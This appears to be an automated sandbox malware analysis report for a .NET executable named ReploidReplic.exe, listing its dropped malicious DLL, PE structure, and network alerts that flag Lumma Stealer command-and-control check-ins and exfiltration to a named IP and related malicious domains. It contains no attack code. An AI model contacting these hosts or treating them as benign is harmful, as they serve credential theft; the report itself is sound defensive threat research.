EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 33 Number of non-executed functions: 64
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.160.17, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ReploidReplic.exe

Simulations

Behavior and APIs

Time	Type	Description
15:09:03	API Interceptor	9x Sleep call for process: aspnet_regiis.exe modified
15:09:16	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
104.21.48.1	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
abruptyopsn.shop	BasesRow.exe	Get hash	malicious	LummaC	Browse	104.21.64.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://compliance-central.com/route/ed5305641af2fd214861ba268e4a42aa2938b075/	Get hash	malicious	Unknown	Browse	1.1.1.1
	Launcher.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	GTA-5-Mod-Menu-2025.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.154.95
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	SharkHack.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.64.143
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	#Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Launcher.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	GTA-5-Mod-Menu-2025.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	hoEtvOOrYH.exe	Get hash	malicious	SmokeLoader	Browse	104.21.48.1
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.48.1
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	SharkHack.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.48.1
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	#Setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ReploidReplic.ex_b1b473bc816ad8b743d6a5079ab4650dad7b61b_3ff1a0df_612b577a-f69b-42c8-a026-913cb922050a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.990187336488767
Encrypted:	false
SSDEEP:	192:GHP0MKBHIOVykd0BU/mMMaupezuiFvZ24IO85W:GMMqHIOVLeBU/mMMa5zuiFvY4IO85W
MD5:	F8B23F55CF2144F235C2410F3FF88EA0
SHA1:	15263EDFD702B5D00AD6D2D535FABF046B6C6ED0
SHA-256:	BD2AF3EACE3F5D4339DED2B12C4D62BAB4DCDDA647E5821C3CF590DCA38CF6FE
SHA-512:	0AF19BCD6B878A7DAD2E8B802CBDD6DD4E325886EBDAD7B3A44C89F95E5D99C6B89261938CD03995280B02B7A875978637341A65D68E005149FD4A85E6068BEF
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.6.2.9.4.3.7.5.9.3.3.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.6.2.9.4.4.9.4.6.8.3.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.2.b.5.7.7.a.-.f.6.9.b.-.4.2.c.8.-.a.0.2.6.-.9.1.3.c.b.9.2.2.0.5.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.2.5.6.d.9.5.-.1.c.e.9.-.4.9.8.e.-.b.5.6.7.-.1.5.1.8.6.a.a.8.f.a.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.p.l.o.i.d.R.e.p.l.i.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.N.a.t.h.a.n.Z.a.c.h.a.r.y.E.l.e.a.n.o.r...p.d.f.n.N.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.0.8.-.0.0.0.1.-.0.0.1.4.-.a.5.4.3.-.a.c.a.b.f.6.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.2.2.0.9.8.6.f.c.3.b.4.d.5.8.f.c.c.0.7.a.f.2.d.8.4.8.d.c.0.8.0.0.0.0.0.0.0.0.!.0.0.0.0.1.2.e.d.1.9.5.0.a.d.0.8.b.2.e.0.d.e.a.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1976.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 30 20:09:04 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	195696
Entropy (8bit):	3.374631036362303
Encrypted:	false
SSDEEP:	1536:yreR6sJad+6pN4uE2aOfYMIBSYaLTgK/36PJU/CDLu++3f:yq6sJw4uEq5oSLTgK/cJxi+
MD5:	60A9627684DB4F562E690C29714BA005
SHA1:	B1E7746ACCD7558B73B82A27EB7172C74BB46D52
SHA-256:	8399471068E4846645DAE930E0EE5841221AD427B6EBA3225F1F3C51BD08417F
SHA-512:	BA40ED0BE54AEFE9544FCF9581C879B8C8451BE4BC3A92AE5D99AE2AEE3F03CBC086E147970EA5E80C2A43D95F9F9AB73379E9E56971144712A2DF7F151C12B3
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........rg............D...............X.......$................J..........`.......8...........T...........00..@...........,............ ..............................................................................eJ....... ......GenuineIntel............T.............rg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B0E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8428
Entropy (8bit):	3.703924410460897
Encrypted:	false
SSDEEP:	192:R6l7wVeJRVw6y6Y9ISU9XhgmfZyzY3pr089bxosf2dbm:R6lXJRi6y6YCSU9Xhgmf8zY7xbfX
MD5:	95D107CFB14A88E9DC5143F1D9058E87
SHA1:	44D63763A5742431628B0D0BA04B93EC04695FD3
SHA-256:	0196DF0F4DD5B16E22F5616305F811C6C9A02035D3448DDD08322D9CD7CF8821
SHA-512:	97E98A4ABD6F2F56A089888B0F953FFDC8D964714734D855F49DA2DB070901BA0FF5D16535DD71C625D8C94D14A50259AB7BFB8EEDCBB792EA76EC73BD4B0B4E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.3.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B4D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4798
Entropy (8bit):	4.516063597432678
Encrypted:	false
SSDEEP:	48:cvIwWl8zsjJg77aI9jQWpW8VYVYm8M4JD2Fio+q8vjOOIRbFoQd:uIjf9I7xp7V1JiKKOIRbFrd
MD5:	0BFF5CEA3932BB7084D34FC94924EA30
SHA1:	465CC9F024AEDDC28AA648DA1388EBA263A7EDDF
SHA-256:	93FAA7CEDE3D7CFC455AE8D91682BCBAB3CD5D742BA5D39581A6983B280713A4
SHA-512:	1E92623F688246C5E9BFDFEF472A5F317063201D8B1060B0E990982141D71EC31D9B9286731444C345C65A436A7DD5B47D4764E2ACB9445E0429DF7E65854989
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="654431" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Users\user\Desktop\ReploidReplic.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	443392
Entropy (8bit):	7.118876394028855
Encrypted:	false
SSDEEP:	6144:3eJ30tMJPD6jnDrAZBvpdqrzOpLidgvFUAuvm2GL7hCmg9y4P+KjxV3Qf2dcLLK7:QjGMZBvb0tuwmg91tFV3QycaA5W
MD5:	1C162E86473AE4C3182F575E264BFA6B
SHA1:	B2841B93A1302BD9F67851D9FB7629CF536235A1
SHA-256:	E66F19D801426502114BD3DA645779B9C2D3ACC06B83B4DE5BCF0EC24E4C5F6C
SHA-512:	6A6770D9A812BDB94BE853DA0E890B28ED6EB213E60FEE2A9043D3C09346CF1E4BF92C1E0F0ECD69AAAB5E61CB849E50D266AEAEF2CC12C6F3B7266C0583042A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L...G.rg...........!.........>............................................................@.............................\|.......P...............................\...\...............................x...@...............T............................text.............................. ..`.rdata...\.......^..................@..@.data...............................@....reloc..\...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.46562754094802
Encrypted:	false
SSDEEP:	6144:eIXfpi67eLPU9skLmb0b4rWSPKaJG8nAgejZMMhA2gX4WABl0uN+dwBCswSbN:zXD94rWlLZMM6YFH0+N
MD5:	C8F5651D2B1AA6413FDCA571ADA0250C
SHA1:	BFBF9FBA097723F4A96D991BC9103725C62273FA
SHA-256:	83CCF1EDB2AEB9693530443F6515C9788BD6139A9288F549AD24B3EB03973A0D
SHA-512:	61AB21C9B2C3D4EBF61BB4F567159B28B64ED8D03A490320B5AE125BBD7DD88F2607AEEBB587B261A5949AF7DA08BDEB78A00612EBBF353F2934CDA0904C5003
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..H..Z...............................................................................................................................................................................................................................................................................................................................................'_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\ReploidReplic.exe
File Type:	ASCII text, with very long lines (356), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1417
Entropy (8bit):	4.53722422649829
Encrypted:	false
SSDEEP:	24:7v74Nu9MvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4QMff2p8p14nrPKktp
MD5:	3F451A96E216677C093DEF4317DE8866
SHA1:	5FDE729742B45D2A0716CE18CB3AE7292D5E715C
SHA-256:	3868A98EDE9688BC165C07A35BA3EB45F35B232FB697AFD6885B2A5E5B6CBF50
SHA-512:	C9246A5DEB5420F1CF144F6AA178353BCBA3E35EBE3D3B36486360AEB0496D909FDF79C1304065F9CC260347DA78D14241C8F82390343A6D531F22842C73340D
Malicious:	false
Preview:	.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "NathanZacharyEleanor" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.Get

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.738857694972729
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ReploidReplic.exe
File size:	707'584 bytes
MD5:	7db52dda50a584c20d69a00d2b13c63d
SHA1:	12ed1950ad08b2e0dea8442d95b33e03de68ca8d
SHA256:	0b571a24307780dc181fd657ee4a9d4fca6a4b2076636d793d906944e3a71e2e
SHA512:	e756eeaecb12ecc5b8603fde6bc30855c860fb4494ff021bf6fbbd51c4012835841682a8af7beea513193e5eab177b79f651d7f891ae8bb71c79a04a4f583f32
SSDEEP:	12288:CusYxZidn8TRgizG9KB7xZ/fTE2CRXR9Fr8uniH67hWi37sypczUPEj/lgxpR+JU:CusY7Y8TRPSKBjTE2CRXjFAbHoYs7
TLSH:	67E47C9C726072DFC867C472DEA81CA8EA91787B971F4217A02716ED9A0D897CF150F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.rg..............0..............@....... ....@.. .......................`............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4b400a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67729049 [Mon Dec 30 12:21:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004B4000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8e750	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0x630	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb4000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x8e000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
KzTnD~C	0x2000	0x8afb0	0x8b000	99fe1db8d696714b47b4398936467576	False	1.0003179097347121	data	7.999695257845116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x8e000	0x20b00	0x20c00	a8d14fddf30daa9edd56736a365973dc	False	0.3307490458015267	data	4.68516812637425	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0x630	0x800	3c506b2847f54dedf8f5cdf3b118e4b5	False	0.3515625	data	3.480657194041579	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb2000	0xc	0x200	49ba7a9e1e9d0fde8dd025f5fdb99dfe	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xb4000	0x10	0x200	4127b9171e3003f39da93ea6e151a6f0	False	0.044921875	data	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb00a0	0x3a4	data			0.4409871244635193
RT_MANIFEST	0xb0444	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T21:09:05.263405+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.48.1	443	TCP
2024-12-30T21:09:05.918183+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.48.1	443	TCP
2024-12-30T21:09:05.918183+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.48.1	443	TCP
2024-12-30T21:09:06.446062+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.48.1	443	TCP
2024-12-30T21:09:06.943164+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	104.21.48.1	443	TCP
2024-12-30T21:09:06.943164+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.48.1	443	TCP
2024-12-30T21:09:07.725901+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.48.1	443	TCP
2024-12-30T21:09:10.474876+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.48.1	443	TCP
2024-12-30T21:09:11.745125+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.48.1	443	TCP
2024-12-30T21:09:13.309211+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.48.1	443	TCP
2024-12-30T21:09:13.619577+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49742	104.21.48.1	443	TCP
2024-12-30T21:09:14.157571+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.48.1	443	TCP
2024-12-30T21:09:15.787491+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	104.21.48.1	443	TCP
2024-12-30T21:09:16.303469+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49746	104.21.48.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 21:09:04.762763023 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:04.762801886 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:04.762867928 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:04.767226934 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:04.767241955 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.263309002 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.263405085 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.277239084 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.277255058 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.278177977 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.330378056 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.501171112 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.501204967 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.501527071 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.918277025 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.918529987 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.918610096 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.921176910 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.921192884 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.921209097 CET	49730	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.921214104 CET	443	49730	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.967161894 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.967204094 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:05.967286110 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.967565060 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:05.967588902 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.445971012 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.446062088 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.459585905 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.459614038 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.460407019 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.472544909 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.472594023 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.472749949 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.943200111 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.943418980 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.943500996 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.943535089 CET	443	49731	104.21.48.1	192.168.2.4
